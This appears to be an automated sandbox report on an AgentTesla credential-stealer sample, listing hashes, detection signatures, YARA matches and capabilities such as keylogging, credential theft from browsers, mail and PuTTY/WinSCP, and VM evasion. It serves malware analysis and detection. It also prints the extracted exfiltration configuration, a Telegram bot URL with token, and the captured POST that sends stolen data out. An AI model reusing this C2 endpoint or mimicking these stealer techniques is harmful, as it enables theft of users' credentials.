Windows Analysis Report
z34PDnVzyEItkXaInw.exe

Overview

General Information

Sample name: z34PDnVzyEItkXaInw.exe
Analysis ID: 1427031
MD5: c85149f68536d2bccb60ad32e88d6895
SHA1: 703e4b9d6db31ad5b83048b3ebf2fea81492df02
SHA256: 4fc57cfe6ad19b764721faf9215457a09ddeebc7402c8833f290181af0b20d5e
Tags: AgentTeslaexe
Infos:

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Agent Tesla, AgentTesla A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
 https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

AV Detection
barindex
Found malware configuration
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Telegram Url": "https://api.telegram.org/bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/sendMessage?chat_id=7178109597"}
Source: z34PDnVzyEItkXaInw.exe.5040.0.memstrmin Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/sendMessage"}
Multi AV Scanner detection for submitted file
Source: z34PDnVzyEItkXaInw.exe ReversingLabs: Detection: 44%
Machine Learning detection for sample
Source: z34PDnVzyEItkXaInw.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: z34PDnVzyEItkXaInw.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: z34PDnVzyEItkXaInw.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 4x nop then jmp 073EAD5Ah 0_2_073EB282

Networking
barindex
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49709 -> 149.154.167.220:443
Uses the Telegram API (likely for C&C communication)
Source: unknown DNS query: name: api.telegram.org
Yara detected Generic Downloader
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: POST /bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc5e67d0031763Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
Source: Joe Sandbox View IP Address: 172.67.74.152 172.67.74.152
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
May check the online IP address of the machine
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown DNS traffic detected: queries for: api.ipify.org
Source: unknown HTTP traffic detected: POST /bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dc5e67d0031763Host: api.telegram.orgContent-Length: 971Expect: 100-continueConnection: Keep-Alive
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.00000000030C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.0000000003051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, z34PDnVzyEItkXaInw.exe, 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://account.dyn.com/
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.0000000003051000.00000004.00000800.00020000.00000000.sdmp, z34PDnVzyEItkXaInw.exe, 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.0000000003051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.0000000003051000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.ipify.org/t
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.00000000030C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp, z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.0000000003051000.00000004.00000800.00020000.00000000.sdmp, z34PDnVzyEItkXaInw.exe, 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4448567496.00000000030C7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot6802803611:AAGpkOXh1yiUdrFGbg2d_rgtxPR9P8L5C4g/sendDocument
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49709 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing
barindex
Contains functionality to log keystrokes (.Net Source)
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, oAKy.cs .Net Code: _2UhYjQFKXB1
Source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, oAKy.cs .Net Code: _2UhYjQFKXB1

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
.NET source code contains very large array initializations
Source: 0.2.z34PDnVzyEItkXaInw.exe.256049c.8.raw.unpack, SQL.cs Large array initialization: : array initializer size 13797
Source: 0.2.z34PDnVzyEItkXaInw.exe.6f80000.12.raw.unpack, SQL.cs Large array initialization: : array initializer size 13797
Detected potential crypto function
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_0086462C 0_2_0086462C
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_04981E1C 0_2_04981E1C
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_04980040 0_2_04980040
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_04981E10 0_2_04981E10
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_049829B1 0_2_049829B1
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_049809F0 0_2_049809F0
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_04980A00 0_2_04980A00
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073EAC00 0_2_073EAC00
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E4F10 0_2_073E4F10
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E5771 0_2_073E5771
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E9748 0_2_073E9748
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E6E28 0_2_073E6E28
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E6E22 0_2_073E6E22
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073EC5D0 0_2_073EC5D0
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E5348 0_2_073E5348
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073EABF1 0_2_073EABF1
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E7260 0_2_073E7260
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 0_2_073E7250 0_2_073E7250
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_0148C062 3_2_0148C062
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_0148E659 3_2_0148E659
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_01484A48 3_2_01484A48
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_01483E30 3_2_01483E30
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_01484178 3_2_01484178
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C0A448 3_2_06C0A448
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C0BD00 3_2_06C0BD00
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C26640 3_2_06C26640
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C255F8 3_2_06C255F8
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C2B288 3_2_06C2B288
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C230A8 3_2_06C230A8
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C2C1E8 3_2_06C2C1E8
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C27DD8 3_2_06C27DD8
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C276F8 3_2_06C276F8
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C2E410 3_2_06C2E410
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C22378 3_2_06C22378
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C20335 3_2_06C20335
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C20021 3_2_06C20021
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Code function: 3_2_06C25D37 3_2_06C25D37
Sample file is different than original file name gathered from version info
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000000.1983682561.00000000000F4000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameDwHX.exe: vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2022935900.0000000002584000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename12c080e2-c78d-49dc-ace2-ba2fdae2ada7.exe4 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2027530519.0000000006F80000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2021791989.00000000006EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2022935900.00000000024B1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSimpleLogin.dll8 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2029749836.0000000008B20000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename12c080e2-c78d-49dc-ace2-ba2fdae2ada7.exe4 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000000.00000002.2024453541.0000000003776000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4445884257.0000000000402000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: OriginalFilename12c080e2-c78d-49dc-ace2-ba2fdae2ada7.exe4 vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe, 00000003.00000002.4446148333.0000000000DE9000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs z34PDnVzyEItkXaInw.exe
Source: z34PDnVzyEItkXaInw.exe Binary or memory string: OriginalFilenameDwHX.exe: vs z34PDnVzyEItkXaInw.exe
Uses 32bit PE files
Source: z34PDnVzyEItkXaInw.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 3.2.z34PDnVzyEItkXaInw.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z34PDnVzyEItkXaInw.exe.37b12f8.10.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: z34PDnVzyEItkXaInw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, ekKu0.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, vKf1z6NvS.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, ZNAvlD7qmXc.cs Cryptographic APIs: 'CreateDecryptor', 'TransformBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, U2doU2.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, BgffYko.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, HrTdA63.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, Vvp22TrBv9g.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, Vvp22TrBv9g.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, Vvp22TrBv9g.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.37768d8.11.raw.unpack, Vvp22TrBv9g.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, I8aDohIKoftP7xwepJ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, g0O6mAVKXhCqDfmWqt.cs Security API names: _0020.SetAccessControl
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, g0O6mAVKXhCqDfmWqt.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.z34PDnVzyEItkXaInw.exe.3895d00.9.raw.unpack, g0O6mAVKXhCqDfmWqt.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/1@2/2
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z34PDnVzyEItkXaInw.exe.log Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Mutant created: NULL
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Mutant created: \Sessions\1\BaseNamedObjects\prKvOVhyPfQxrDZhTVCa
Source: z34PDnVzyEItkXaInw.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: z34PDnVzyEItkXaInw.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: z34PDnVzyEItkXaInw.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe File read: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe:Zone.Identifier Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe "C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe"
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process created: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe "C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe"
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Process created: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe "C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe" Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z34PDnVzyEItkXaInw.exe Section loaded: rasadhlp.dll Jump to behavior
